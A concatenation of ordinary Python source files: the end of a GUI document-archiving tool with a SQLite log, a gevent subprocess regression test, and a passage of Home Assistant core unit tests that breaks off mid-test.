    def _ensure_directory(dir_path):
        # Best-effort creation; mirrors the original behavior of printing (not raising) on failure.
        if not os.path.exists(dir_path):
            try:
                os.mkdir(dir_path)
            except Exception as e:
                print(e)
                print(f"error from trying to make {dir_path}")

    ### Build necessary directory structure ###
    self.files_to_archive_directory = files_to_archive_directory
    _ensure_directory(self.files_to_archive_directory)
    self.app_files_directory = app_files_directory
    _ensure_directory(self.app_files_directory)
    # Temp directory where open_file_copy() places throwaway copies of files being inspected.
    self.opened_copies_directory = os.path.join(self.app_files_directory, 'temp')
    _ensure_directory(self.opened_copies_directory)

    gui_file_icon_path = os.path.join(self.app_files_directory, gui_file_icon) if gui_file_icon else ''
    gui_dir_icon_path = os.path.join(self.app_files_directory, gui_dir_icon) if gui_dir_icon else ''
    self.records_drive_path = records_drive_path
    self.gui = GuiHandler(file_icon_path=gui_file_icon_path, folder_icon_path=gui_dir_icon_path)
    self.file_to_archive = file_to_archive
    self.email = None
    # Remembered across files so the archivist doesn't retype the project number each time.
    self.default_project_number = None
    self.perform_research = True
    self.researcher = Researcher()
    self.database = SqliteDatabase(database_location)
    self.datetime_format = "%m/%d/%Y, %H:%M:%S"
def info_window(self, window_name="ERROR", info_message='', is_error=True) -> bool:
    """
    Display a modal informational (or error) window and wait for the user.

    :param window_name: title of the window
    :param info_message: string message to display
    :param is_error: use the special error presentation of the message layout
    :return: bool whether the user hit the 'ok' button
    """
    layout = self.gui.info_message_layout(info_message=info_message, error=is_error)
    results = self.gui.make_window(window_name=window_name, window_layout=layout)
    button = results["Button Event"].lower()
    # 'Exit' button or closing the window shuts the whole app down.
    if button in ["exit", self.gui.window_close_button_event.lower()]:
        self.exit_app()
    return button == "ok"
def retrieve_email(self):
    """
    Show the welcome window and record the archivist's email in self.email.
    Shuts the app down if the user exits or closes the window.
    """
    results = self.gui.make_window("Welcome!", self.gui.welcome_layout())
    button = results["Button Event"].lower()
    if button in ["exit", self.gui.window_close_button_event.lower()]:
        # User bailed out before entering anything.
        self.exit_app()
    else:
        self.email = results["Archivist Email"]
    return
def open_file_copy(self, filepath: str = ''):
    """
    Create a copy of the file in the opened_copies_directory and open that copy with the
    system's default application. Opens self.file_to_archive if no filepath is given.
    Opening a copy keeps the original free to be moved/archived while it is being viewed.

    :param filepath: path of the file to copy and open; defaults to the current file to archive
    :return: None
    """
    if not filepath:
        filepath = self.file_to_archive.current_path
    # Whole-second timestamp prefix keeps successive copies of the same file unique.
    # (Replaces the roundabout str(time.time()).split(".")[0].)
    timestamp = str(int(time.time()))
    filename = ArchiverUtilities.split_path(filepath)[-1]
    copies_dir = os.path.join(os.getcwd(), self.opened_copies_directory)
    copy_path = os.path.join(copies_dir, timestamp + "_" + filename)
    shutil.copyfile(src=filepath, dst=copy_path)
    ArchiverUtilities.open_file_with_system_application(copy_path)
    return
def files_to_archive(self, archiver_dir_path=None):
    """
    Return a list of full paths of the files awaiting archiving in
    self.files_to_archive_directory (or archiver_dir_path, which also becomes the new
    default directory when given).

    :param archiver_dir_path: path to directory with files to archive
    :return: list of filepaths
    """
    if archiver_dir_path:
        # A new directory was supplied; remember it for subsequent calls.
        self.files_to_archive_directory = archiver_dir_path
    elif self.files_to_archive_directory:
        archiver_dir_path = self.files_to_archive_directory
    # TODO if not archiver_dir_path and not self.files_to_archive_directory (maybe not relevant)
    paths = []
    for entry in os.listdir(archiver_dir_path):
        full_path = os.path.join(archiver_dir_path, entry)
        # Skip housekeeping filenames and sub-directories.
        if entry in FILENAMES_TO_IGNORE or os.path.isdir(full_path):
            continue
        paths.append(full_path)
    return paths
def retrieve_file_destination_choice(self):
    """
    Show the destination-choice window for the next file in the archiving directory and
    build self.file_to_archive from the user's answers.

    :return: the new ArchivalFile on 'ok'; "" on 'back' or when a manual path lacks a
             project number; None if some other button event falls through.
    """
    files_in_archiving_dir = self.files_to_archive()
    # Pre-fill the project number field with the remembered default, if any.
    default_proj_number = ""
    if self.default_project_number:
        default_proj_number = self.default_project_number
    current_file = ArchiverUtilities.split_path(files_in_archiving_dir[0])[-1]
    destination_window_layout = self.gui.destination_choice_layout(dir_choices=DIRECTORY_CHOICES,
                                                                   current_filename=current_file,
                                                                   default_project_num=default_proj_number,
                                                                   research_default=self.perform_research)
    destination_gui_results = self.gui.make_window(window_name="Enter file and destination info.",
                                                   window_layout=destination_window_layout)
    # No event at all (window destroyed) is treated like an explicit exit.
    if (not destination_gui_results["Button Event"]) or destination_gui_results["Button Event"].lower() in ["exit", self.gui.window_close_button_event.lower()]:
        self.exit_app()
    # If the user selects the open-copy button, open a copy and relaunch the window.
    if destination_gui_results["Button Event"].lower() == "open copy":
        self.open_file_copy()
        return self.retrieve_file_destination_choice()
    if destination_gui_results["Button Event"].lower() == "back":
        return ""
    if destination_gui_results["Button Event"].lower() == "ok":
        # Use default project number unless a new project number was given.
        project_num = destination_gui_results["New Project Number"]
        if not project_num:
            project_num = default_proj_number
        self.default_project_number = project_num
        # Set the default research setting for subsequent files.
        self.perform_research = destination_gui_results["Research"]
        directory_choice = ''
        file_code = ''
        if destination_gui_results["Directory Choice"]:
            directory_choice = destination_gui_results["Directory Choice"][0]
        # If there was a manually entered path, populate the file_code, destination_dir, and
        # cached_destination_path attributes for the file_to_archive attribute.
        manual_archived_path = destination_gui_results["Manual Path"]
        doc_date = destination_gui_results["Document Date"]
        if manual_archived_path:
            # Need to attempt to extract the destination directory from the manual filepath.
            # Do this by moving in reverse through the path and grabbing the highest level
            # directory that starts with a filing code.
            file_codes_list = [ArchiverUtilities.file_code_from_destination_dir(dir) for dir in DIRECTORY_CHOICES]
            # Single-letter codes get a trailing space so the [:2] prefix test below matches "H ".
            file_codes_list = [code + " " if len(code) == 1 else code for code in file_codes_list]
            directory_choice = ""
            manual_path_list = ArchiverUtilities.split_path(manual_archived_path)
            manual_path_list.reverse()
            # Compare 2- and 3-character prefixes against the known filing codes.
            for idx, dirname in enumerate(manual_path_list):
                if (dirname[:3] in file_codes_list) or (dirname[:2] in file_codes_list):
                    directory_choice = dirname
                    break
            if not directory_choice:
                raise Exception(f"Could not parse a filing code from the given directory path: \n{manual_archived_path}")
            file_code = ArchiverUtilities.file_code_from_destination_dir(directory_choice)
            # Attempt to get the project number from the path.
            # If no project number then request the archivist enter one.
            project_num = ArchiverUtilities.project_number_from_path(manual_archived_path)
            if not project_num:
                error = "Unable to parse a project number from the destination path. Please enter a project number in addition to the destination path."
                no_proj_num_layout = self.gui.info_message_layout(info_message=str(error), error=True)
                self.gui.make_window("Missing project number", window_layout=no_proj_num_layout)
                return ""
        file_notes = destination_gui_results["Notes"]
        new_filename = None
        if destination_gui_results["Filename"]:
            new_filename = ArchiverUtilities.cleanse_filename(destination_gui_results["Filename"])
        self.file_to_archive = ArchivalFile(current_path=files_in_archiving_dir[0],
                                            project=project_num,
                                            new_filename=new_filename,
                                            destination_dir=directory_choice,
                                            document_date=doc_date,
                                            notes=file_notes)
        if manual_archived_path:
            if file_code:
                self.file_to_archive.file_code = file_code
            # Manual path wins: record the fully assembled destination up front.
            self.file_to_archive.cached_destination_path = os.path.join(manual_archived_path,
                                                                        self.file_to_archive.assemble_destination_filename())
        return self.file_to_archive
def research_for_archival_file(self, files=None, destinations=None):
    """
    Wrapper that packages the researcher's results so it can be called within
    GuiHandler.loading_screen(), which cannot return values: results are appended
    in place to the caller-supplied lists (callers rely on that mutation).

    BUG FIX: the defaults used to be mutable ([]), which Python shares across
    calls — repeated no-argument calls would accumulate stale results.

    :param files: list extended in place with similar-filename result dicts
    :param destinations: list extended in place with example destination dir paths
    :return: (files, destinations)
    """
    if files is None:
        files = []
    if destinations is None:
        destinations = []
    filename = self.file_to_archive.new_filename
    if not filename:
        # No rename requested; research the file's current name instead.
        filename = ArchiverUtilities.split_path(self.file_to_archive.current_path)[-1]
    # += extends the caller's list object in place, which is the whole point here.
    files += self.researcher.similar_filename_paths(original_filename=filename, duration=6,
                                                    similarity_threshold=72, max_paths=7)
    destinations += self.researcher.randomized_destination_examples(
        dest_dir=self.file_to_archive.destination_dir)
    return files, destinations
def confirm_chosen_file_destination(self):
    """
    Spin up the confirmation screen gui and return True if the desired path has been
    confirmed by the user. Will perform research if that option was ticked.
    This will also exit the program if the user selects the 'exit' button in the gui.

    :return: bool whether the user confirmed the destination ('ok'); False when the
             destination path could not even be assembled.
    """
    try:
        file_destination = self.file_to_archive.get_destination_path()
    except Exception as error:
        # Destination could not be assembled from the choices; show the error and bail.
        except_layout = self.gui.info_message_layout(info_message=str(error), error=True)
        gui_results = self.gui.make_window(window_name="Invalid Destination Choices", window_layout=except_layout)
        if gui_results["Button Event"].lower() in ["exit", self.gui.window_close_button_event.lower()]:
            self.exit_app()
        return False
    else:
        # If the destination directory exists, we'll display its contents as a tree element.
        # First extract the path to the destination directory and see if it already exists.
        destination_tree = None
        destination_list = ArchiverUtilities.split_path(self.file_to_archive.get_destination_path())
        path_to_destination_dir = os.path.join(*destination_list[:-1])
        if os.path.exists(path_to_destination_dir):
            destination_tree = self.gui.directory_treedata('', path_to_destination_dir)
        # If the user chose to do research...
        similar_files_paths, destination_examples = [], []
        if self.perform_research:
            # The loading screen gui cannot return values, hence some jiggery-pokery to make
            # the function mutate existing lists in lieu of returning the research results.
            perform_research = lambda : self.research_for_archival_file(files=similar_files_paths,
                                                                        destinations=destination_examples)
            self.gui.loading_screen(long_func=perform_research, loading_window_name="Researching...",
                                    loading_text= "Performing research; please wait...")
            similar_files_paths = [path['filepath'] for path in similar_files_paths]
            # Create tree data structures from the example directory paths.
            destination_examples = {path: self.gui.directory_treedata('', path) for path in destination_examples}
        confirmation_gui_layout = self.gui.confirmation_layout(destination_path=file_destination,
                                                               destination_tree_data=destination_tree,
                                                               similar_files=similar_files_paths,
                                                               dir_trees=destination_examples)
        gui_results = self.gui.make_window("Confirm destination choice.", confirmation_gui_layout)
        if gui_results["Button Event"].lower() in ["exit", self.gui.window_close_button_event.lower()]:
            self.exit_app()
        return gui_results["Button Event"].lower() == "ok"
def archive_file(self):
    """
    Attempt to archive self.file_to_archive, reporting any problems via info windows.

    :return: bool whether the file was archived. False on a destination path collision
             or a failed copy.
    """
    # If there is a path collision throw an error.
    if self.file_to_archive.cached_destination_path and os.path.exists(self.file_to_archive.cached_destination_path):
        self.info_window(
            info_message=f"A file exists in that location with the same path: {self.file_to_archive.cached_destination_path}")
        # BUG FIX: this used to be a bare `return` (None). False keeps the return type
        # consistent with the other branches (still falsy for existing callers).
        return False
    # Try to archive the file (kinda fraught) and display any issues that might have come up.
    archiving_successful, archive_exception = self.file_to_archive.archive()
    if not archiving_successful:
        permission_issue = self.file_to_archive.check_permissions()
        permissions_error_message = "When attempting to duplicate the file to the records drive, \n" +\
                                    "the application ran into file access issues: \n"
        if archive_exception:
            permissions_error_message += f"The shutil.copyfile() call produced this error: \n {archive_exception}\n"
        if permission_issue:
            permissions_error_message += f"Testing the permissions of the file yielded: \n {permission_issue}\n"
        self.info_window(info_message=permissions_error_message)
        return False
    return True
def add_archived_file_to_csv(self, csv_path):
    """
    Append the archived file's metadata (plus the archivist's email) to a csv file,
    creating the file with a header row first if it doesn't exist yet.
    Deprecated en lieu of using the sql storage solution.

    :param csv_path: path of the csv file to append to
    :return: None
    """
    data_dict = self.file_to_archive.attribute_defaultdict()
    data_dict["archiver_email"] = self.email
    # Make the csv file (headers only) if it doesn't yet exist.
    if not os.path.exists(csv_path):
        pd.DataFrame(columns=list(data_dict.keys())).to_csv(csv_path)
    row_frame = pd.DataFrame(data_dict, index=[0, ])
    row_frame.to_csv(csv_path, mode='a', index=False, header=False)
def add_archived_file_to_database(self):
    """
    Store the archival metadata for the current file_to_archive, tagged with the
    archivist's email, in the sqlite database.

    :return: None
    """
    self.database.record_document(arch_document= self.file_to_archive, archivist_email= self.email)
def retrieve_file_to_archive(self):
    """
    Ensure files exist to be archived and queue the next one up as self.file_to_archive.
    Blocks (re-showing an info window) until at least one file is present.

    :return: None
    """
    while not self.files_to_archive():
        no_file_error_message = f"No files to archive. To archive additional files, add them to: " + os.linesep +\
                                f"{self.files_to_archive_directory}"
        self.info_window(window_name="Directory Empty", info_message=no_file_error_message, is_error=False)
    # BUG FIX: files_to_archive() already returns full paths; the old code joined the
    # result onto the directory again, which only worked because os.path.join drops the
    # first component when the second is absolute. Use the path directly.
    current_file_path = self.files_to_archive()[0]
    self.file_to_archive = ArchivalFile(current_path=current_file_path)
def exit_app(self):
    """
    Process for shutting down the app. Attempts to clear the temporary files directory,
    then terminates the interpreter.

    :return: does not return; raises SystemExit
    """
    # Attempt to delete all the files in the self.opened_copies_directory.
    open_copies_dir_path = os.path.join(os.getcwd(), self.opened_copies_directory)
    opened_file_copies = [os.path.join(open_copies_dir_path, f) for f in os.listdir(open_copies_dir_path) if
                          os.path.isfile(os.path.join(open_copies_dir_path, f))]
    for opened_filepath in opened_file_copies:
        try:
            os.remove(opened_filepath)
        except Exception as e:
            # A copy may still be open in a viewer; report and keep cleaning up the rest.
            print(f"Failed at deleting a temp file: \n {opened_filepath}\n Error: \n {e}")
            continue
    # BUG FIX: exit() is the site-module convenience helper and is not guaranteed to exist
    # outside interactive sessions (e.g. under -S or when frozen); raise SystemExit directly.
    raise SystemExit
class Tester:
    """
    Ad-hoc manual test harness: each static method exercises one component interactively.
    NOTE(review): several methods use hard-coded developer-machine paths — they only run
    in that environment; confirm before relying on them.
    """

    @staticmethod
    def test_gui():
        """ Manually exercise the confirmation window with some sample directory trees. """
        dir = r"C:\Users\adankert\Google Drive\GitHub\archives_archiver\app_files"
        file_icon_path = os.path.join(dir, "file_3d_32x32.png")
        folder_icon_path = os.path.join(dir, "folder_3d_32x32.png")
        gui = GuiHandler(file_icon_path=file_icon_path, folder_icon_path=folder_icon_path)
        path_examples = [r"R:\49xx Long Marine Lab\4900\4900-007\F5 - Drawings and Specifications",
                         r"R:\49xx Long Marine Lab\4900\4900-021\A - General\A2 - Working File",
                         r"R:\27xx Applied Sciences Baskin Engineering\2703\2703\F8 - Contract"]
        forest = []
        for example in path_examples:
            forest.append(gui.directory_treedata('', example))
        gui.make_window("Test Confirm",
                        gui.confirmation_layout(r"C:\Users\adankert\Google Drive\GitHub\archives_archiver\app_files",
                                                similar_files=[], dir_trees=forest))

    @staticmethod
    def test_assemble_destination_path():
        """ Print the destination path assembled for a sample ArchivalFile. """
        project = '2700'
        desired_destination = DIRECTORY_CHOICES[8]
        print(desired_destination)
        new_filename = "2744.G19.Notice of Completion"
        location = os.path.join(os.getcwd(), "files_to_archive")
        # NOTE(review): keyword is current_location_path here but current_path elsewhere —
        # verify against the ArchivalFile signature.
        file = ArchivalFile(current_location_path=location, project=project, new_filename=new_filename,
                            destination_dir=desired_destination)
        dest_path = file.get_destination_path()
        print(dest_path)

    @staticmethod
    def test_researcher():
        """ Run both Researcher searches and print their results. """
        print("Similar File Examples: \n")
        og_filename = "20.07.10 Sewer Excavated.pdf"
        searcher = Researcher()
        similar_filenames = searcher.similar_filename_paths(original_filename=og_filename, duration=8)
        [print(x["filepath"]) for x in similar_filenames]
        print("\n \n")
        print("Destination Examples: \n")
        dir_choice = "C1 - Executive Architect"
        directory_examples = searcher.randomized_destination_examples(dest_dir= dir_choice, duration= 18)
        [print(example) for example in directory_examples]

    @staticmethod
    def test_loading_screen():
        """ Show the loading screen around an 8 second sleep. """
        def wait_eight():
            print("waiting 8 seconds.")
            time.sleep(8)
            print("wait over")
        gui = GuiHandler()
        gui.loading_screen(wait_eight)
        return

    @staticmethod
    def test_layout(some_layout):
        """ Open an arbitrary layout briefly and return its first (event, values). """
        window = sg.Window("test", some_layout)
        event, values = window.read()
        time.sleep(2)
        window.close()
        return event, values

    @staticmethod
    def test_sqlitedb():
        """ Record a sample document in a scratch sqlite database. """
        location = r"\\128.114.170.27\Cannon_Scans\test_db"
        datetime_format = "%m/%d/%Y, %H:%M:%S"
        DB = SqliteDatabase(location, "test.db", datetime_format)
        test_file = ArchivalFile(
            current_path=r"C:\Users\adankert\Google Drive\GitHub\archives_archiver\files_to_archive\20220317103244.pdf",
            project='2512',destination_path=r"R:\24xx Physical Plant Buildings\2512\F8 - Contract",
            new_filename= "RFI 061",notes="These are test notes",destination_dir="F8 - Contract",
            document_date="December 5, 2012")
        DB.record_document(test_file, 'testemail2@ucsc.edu')
def main():
    """
    Entry point: build the Archivist with the app's paths, ask for the archivist's email,
    then loop forever retrieving, confirming, archiving and recording files.
    """
    app_files_dir = 'app_files'
    database_path = r"\\128.114.170.27\Archive_Data\archives_archiver.db"
    gui_file_icon_filename = "file_3d_32x32.png"
    gui_dir_icon_filename = "folder_3d_32x32.png"
    dir_of_files_to_archive = os.path.join(os.getcwd(), "files_to_archive")
    ppdo_archivist = Archivist(files_to_archive_directory=dir_of_files_to_archive,
                               app_files_directory=os.path.join(os.getcwd(), app_files_dir),
                               records_drive_path=RECORDS_SERVER_LOCATION,
                               gui_file_icon=gui_file_icon_filename,
                               gui_dir_icon=gui_dir_icon_filename,
                               database_location=database_path)
    ppdo_archivist.retrieve_email()
    while True:
        ppdo_archivist.retrieve_file_to_archive()
        ppdo_archivist.retrieve_file_destination_choice()
        # If no destination directory was chosen display an error message.
        if not ppdo_archivist.file_to_archive.destination_dir:
            # BUG FIX: the message used to be passed positionally, landing in the
            # window_name parameter and leaving the message body empty.
            ppdo_archivist.info_window(info_message="No destination directory was selected.")
            continue
        destination_confirmed = ppdo_archivist.confirm_chosen_file_destination()
        if destination_confirmed:
            is_archived = ppdo_archivist.archive_file()
            if is_archived:
                ppdo_archivist.add_archived_file_to_database()
                print(f"File archived: " + os.linesep + f"{ppdo_archivist.file_to_archive.cached_destination_path}")
if __name__ == "__main__":
    # Manual test hooks; uncomment one to exercise an individual component instead of the app.
    # Tester.test_gui()
    # Tester.test_assemble_destination_path()
    # Tester.test_researcher()
    # Tester.test_loading_screen()
    # Tester.test_sqlitedb()
    main()
|
test__issue600.py | # Make sure that libev child watchers, implicitly installed through the use
# of subprocess, do not cause waitpid() to fail to poll for processes.
# NOTE: This was only reproducible under python 2.
from __future__ import print_function
import gevent
from gevent import monkey
monkey.patch_all()
import sys
from multiprocessing import Process
from subprocess import Popen, PIPE
from gevent import testing as greentest
def f(sleep_sec):
    """Child-process target: cooperatively sleep for sleep_sec seconds."""
    gevent.sleep(sleep_sec)
class TestIssue600(greentest.TestCase):
    """Regression tests for issue #600: libev child watchers must not break waitpid polling."""

    # Process startup/teardown can be slow on loaded CI machines.
    __timeout__ = greentest.LARGE_TIMEOUT

    @greentest.skipOnLibuvOnPyPyOnWin("hangs")
    def test_invoke(self):
        # Run a subprocess through Popen to make sure
        # libev is handling SIGCHLD. This could *probably* be simplified to use
        # just hub.loop.install_sigchld
        # (no __enter__/__exit__ on Py2) pylint:disable=consider-using-with
        p = Popen([sys.executable, '-V'], stdout=PIPE, stderr=PIPE)
        gevent.sleep(0)
        p.communicate()
        gevent.sleep(0)

    def test_process(self):
        # Launch a multiprocessing child that sleeps briefly, then make sure
        # join() actually notices it exiting.
        p = Process(target=f, args=(0.5,))
        p.start()
        with gevent.Timeout(3):
            # Poll for up to 10 seconds. If the bug exists,
            # this will timeout because our subprocess should
            # be long gone by now
            p.join(10)
if __name__ == '__main__':
    # Run this module's tests through gevent's test runner.
    greentest.main()
|
test_core.py | """
tests.test_core
~~~~~~~~~~~~~~~~~
Provides tests to verify that Home Assistant core works.
"""
# pylint: disable=protected-access,too-many-public-methods
# pylint: disable=too-few-public-methods
import os
import unittest
import unittest.mock as mock
import time
import threading
from datetime import datetime
import pytz
import homeassistant.core as ha
from homeassistant.exceptions import (
HomeAssistantError, InvalidEntityFormatError)
import homeassistant.util.dt as dt_util
from homeassistant.helpers.event import track_state_change
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
ATTR_FRIENDLY_NAME, TEMP_CELCIUS,
TEMP_FAHRENHEIT)
PST = pytz.timezone('America/Los_Angeles')
class TestHomeAssistant(unittest.TestCase):
    """
    Tests the Home Assistant core classes.
    """

    def setUp(self):  # pylint: disable=invalid-name
        """ things to be run when tests are started. """
        self.hass = ha.HomeAssistant()
        self.hass.states.set("light.Bowl", "on")
        self.hass.states.set("switch.AC", "off")

    def tearDown(self):  # pylint: disable=invalid-name
        """ Stop down stuff we started. """
        try:
            self.hass.stop()
        except HomeAssistantError:
            # Already stopped after the block till stopped test
            pass

    def test_start(self):
        """ EVENT_HOMEASSISTANT_START fires exactly once when hass starts. """
        calls = []
        self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START,
                                  lambda event: calls.append(1))
        self.hass.start()
        self.hass.pool.block_till_done()
        self.assertEqual(1, len(calls))

    def test_block_till_stoped(self):
        """ Test if we can block till stop service is called. """
        blocking_thread = threading.Thread(target=self.hass.block_till_stopped)
        self.assertFalse(blocking_thread.is_alive())
        blocking_thread.start()
        # Threads are unpredictable, try 20 times if we're ready
        wait_loops = 0
        while not blocking_thread.is_alive() and wait_loops < 20:
            wait_loops += 1
            time.sleep(0.05)
        self.assertTrue(blocking_thread.is_alive())
        self.hass.services.call(ha.DOMAIN, ha.SERVICE_HOMEASSISTANT_STOP)
        self.hass.pool.block_till_done()
        # Threads are unpredictable, try 20 times if we're ready
        wait_loops = 0
        while blocking_thread.is_alive() and wait_loops < 20:
            wait_loops += 1
            time.sleep(0.05)
        self.assertFalse(blocking_thread.is_alive())

    def test_stopping_with_keyboardinterrupt(self):
        """ KeyboardInterrupt in the run loop triggers the stop event. """
        calls = []
        self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP,
                                  lambda event: calls.append(1))

        def raise_keyboardinterrupt(length):
            # We don't want to patch the sleep of the timer.
            if length == 1:
                raise KeyboardInterrupt

        self.hass.start()
        with mock.patch('time.sleep', raise_keyboardinterrupt):
            self.hass.block_till_stopped()
        self.assertEqual(1, len(calls))

    def test_track_point_in_time(self):
        """ Test track point in time. """
        before_birthday = datetime(1985, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
        birthday_paulus = datetime(1986, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
        after_birthday = datetime(1987, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
        runs = []
        self.hass.track_point_in_utc_time(
            lambda x: runs.append(1), birthday_paulus)
        self._send_time_changed(before_birthday)
        self.hass.pool.block_till_done()
        self.assertEqual(0, len(runs))
        self._send_time_changed(birthday_paulus)
        self.hass.pool.block_till_done()
        self.assertEqual(1, len(runs))
        # A point in time tracker will only fire once, this should do nothing
        self._send_time_changed(birthday_paulus)
        self.hass.pool.block_till_done()
        self.assertEqual(1, len(runs))
        self.hass.track_point_in_time(
            lambda x: runs.append(1), birthday_paulus)
        self._send_time_changed(after_birthday)
        self.hass.pool.block_till_done()
        self.assertEqual(2, len(runs))

    def test_track_time_change(self):
        """ Test tracking time change. """
        wildcard_runs = []
        specific_runs = []
        self.hass.track_time_change(lambda x: wildcard_runs.append(1))
        self.hass.track_utc_time_change(
            lambda x: specific_runs.append(1), second=[0, 30])
        self._send_time_changed(datetime(2014, 5, 24, 12, 0, 0))
        self.hass.pool.block_till_done()
        self.assertEqual(1, len(specific_runs))
        self.assertEqual(1, len(wildcard_runs))
        self._send_time_changed(datetime(2014, 5, 24, 12, 0, 15))
        self.hass.pool.block_till_done()
        self.assertEqual(1, len(specific_runs))
        self.assertEqual(2, len(wildcard_runs))
        self._send_time_changed(datetime(2014, 5, 24, 12, 0, 30))
        self.hass.pool.block_till_done()
        self.assertEqual(2, len(specific_runs))
        self.assertEqual(3, len(wildcard_runs))

    def _send_time_changed(self, now):
        """ Send a time changed event. """
        self.hass.bus.fire(ha.EVENT_TIME_CHANGED, {ha.ATTR_NOW: now})
class TestEvent(unittest.TestCase):
    """ Test Event class. """

    def test_eq(self):
        """ Two events with the same type, data and fired time compare equal. """
        now = dt_util.utcnow()
        data = {'some': 'attr'}
        event1, event2 = [
            ha.Event('some_type', data, time_fired=now)
            for _ in range(2)
        ]
        self.assertEqual(event1, event2)

    def test_repr(self):
        """ Test that repr method works. #MoreCoverage """
        self.assertEqual(
            "<Event TestEvent[L]>",
            str(ha.Event("TestEvent")))
        self.assertEqual(
            "<Event TestEvent[R]: beer=nice>",
            str(ha.Event("TestEvent",
                         {"beer": "nice"},
                         ha.EventOrigin.remote)))

    def test_as_dict(self):
        """ as_dict serializes type, data, origin and fired time. """
        event_type = 'some_type'
        now = dt_util.utcnow()
        data = {'some': 'attr'}
        event = ha.Event(event_type, data, ha.EventOrigin.local, now)
        expected = {
            'event_type': event_type,
            'data': data,
            'origin': 'LOCAL',
            'time_fired': dt_util.datetime_to_str(now),
        }
        self.assertEqual(expected, event.as_dict())
class TestEventBus(unittest.TestCase):
    """ Test EventBus methods. """

    def setUp(self):  # pylint: disable=invalid-name
        """ things to be run when tests are started. """
        # Worker pool starts with 0 workers so each test controls when events get processed.
        self.bus = ha.EventBus(ha.create_worker_pool(0))
        self.bus.listen('test_event', lambda x: len)

    def tearDown(self):  # pylint: disable=invalid-name
        """ Stop down stuff we started. """
        self.bus._pool.stop()

    def test_add_remove_listener(self):
        """ Test remove_listener method. """
        self.bus._pool.add_worker()
        old_count = len(self.bus.listeners)
        listener = lambda x: len
        self.bus.listen('test', listener)
        self.assertEqual(old_count + 1, len(self.bus.listeners))
        # Try deleting a non registered listener, nothing should happen
        self.bus.remove_listener('test', lambda x: len)
        # Remove listener
        self.bus.remove_listener('test', listener)
        self.assertEqual(old_count, len(self.bus.listeners))
        # Try deleting listener while category doesn't exist either
        self.bus.remove_listener('test', listener)

    def test_listen_once_event(self):
        """ Test listen_once_event method. """
        runs = []
        self.bus.listen_once('test_event', lambda x: runs.append(1))
        self.bus.fire('test_event')
        # Second time it should not increase runs
        self.bus.fire('test_event')
        self.bus._pool.add_worker()
        self.bus._pool.block_till_done()
        self.assertEqual(1, len(runs))
class TestState(unittest.TestCase):
    """ Test State class methods. """

    def test_init(self):
        """ Test state.init """
        # Entity ids must have the '<domain>.<object_id>' shape.
        self.assertRaises(
            InvalidEntityFormatError, ha.State,
            'invalid_entity_format', 'test_state')

    def test_domain(self):
        """ domain is the part of the entity id before the dot. """
        state = ha.State('some_domain.hello', 'world')
        self.assertEqual('some_domain', state.domain)

    def test_object_id(self):
        """ object_id is the part of the entity id after the dot. """
        state = ha.State('domain.hello', 'world')
        self.assertEqual('hello', state.object_id)

    def test_name_if_no_friendly_name_attr(self):
        """ name falls back to the object id with underscores turned into spaces. """
        state = ha.State('domain.hello_world', 'world')
        self.assertEqual('hello world', state.name)

    def test_name_if_friendly_name_attr(self):
        """ name uses the friendly-name attribute when it is present. """
        name = 'Some Unique Name'
        state = ha.State('domain.hello_world', 'world',
                         {ATTR_FRIENDLY_NAME: name})
        self.assertEqual(name, state.name)

    def test_copy(self):
        """ A copy compares equal to the original state. """
        state = ha.State('domain.hello', 'world', {'some': 'attr'})
        self.assertEqual(state, state.copy())

    def test_dict_conversion(self):
        """ A state survives an as_dict/from_dict round trip. """
        state = ha.State('domain.hello', 'world', {'some': 'attr'})
        self.assertEqual(state, ha.State.from_dict(state.as_dict()))

    def test_dict_conversion_with_wrong_data(self):
        """ from_dict returns None for missing or incomplete input. """
        self.assertIsNone(ha.State.from_dict(None))
        self.assertIsNone(ha.State.from_dict({'state': 'yes'}))
        self.assertIsNone(ha.State.from_dict({'entity_id': 'yes'}))

    def test_repr(self):
        """ Test state.repr """
        self.assertEqual("<state happy.happy=on @ 12:00:00 08-12-1984>",
                         str(ha.State(
                             "happy.happy", "on",
                             last_changed=datetime(1984, 12, 8, 12, 0, 0))))
        self.assertEqual(
            "<state happy.happy=on; brightness=144 @ 12:00:00 08-12-1984>",
            str(ha.State("happy.happy", "on", {"brightness": 144},
                         datetime(1984, 12, 8, 12, 0, 0))))
class TestStateMachine(unittest.TestCase):
    """ Test EventBus methods. """

    def setUp(self):  # pylint: disable=invalid-name
        """ things to be run when tests are started. """
        # A 0-worker pool queues jobs; tests add a worker when they need
        # the queued listener jobs to actually run.
        self.pool = ha.create_worker_pool(0)
        self.bus = ha.EventBus(self.pool)
        self.states = ha.StateMachine(self.bus)
        self.states.set("light.Bowl", "on")
        self.states.set("switch.AC", "off")

    def tearDown(self):  # pylint: disable=invalid-name
        """ Stop down stuff we started. """
        self.pool.stop()

    def test_is_state(self):
        """ Test is_state method. """
        self.assertTrue(self.states.is_state('light.Bowl', 'on'))
        self.assertFalse(self.states.is_state('light.Bowl', 'off'))
        self.assertFalse(self.states.is_state('light.Non_existing', 'on'))

    def test_entity_ids(self):
        """ Test get_entity_ids method. """
        # Entity ids come back lower-cased even though setUp used mixed case.
        ent_ids = self.states.entity_ids()
        self.assertEqual(2, len(ent_ids))
        self.assertTrue('light.bowl' in ent_ids)
        self.assertTrue('switch.ac' in ent_ids)

        # Filtering by domain returns only that domain's entities.
        ent_ids = self.states.entity_ids('light')
        self.assertEqual(1, len(ent_ids))
        self.assertTrue('light.bowl' in ent_ids)

    def test_all(self):
        """ all() yields one State per tracked entity. """
        states = sorted(state.entity_id for state in self.states.all())
        self.assertEqual(['light.bowl', 'switch.ac'], states)

    def test_remove(self):
        """ Test remove method. """
        self.assertTrue('light.bowl' in self.states.entity_ids())
        self.assertTrue(self.states.remove('light.bowl'))
        self.assertFalse('light.bowl' in self.states.entity_ids())

        # If it does not exist, we should get False
        self.assertFalse(self.states.remove('light.Bowl'))

    def test_track_change(self):
        """ Test states.track_change. """
        # Add a worker so the queued listener jobs get executed.
        self.pool.add_worker()

        # 2 lists to track how often our callbacks got called
        specific_runs = []
        wildcard_runs = []

        # Specific listener: fires only on the exact on -> off transition.
        self.states.track_change(
            'light.Bowl', lambda a, b, c: specific_runs.append(1), 'on', 'off')
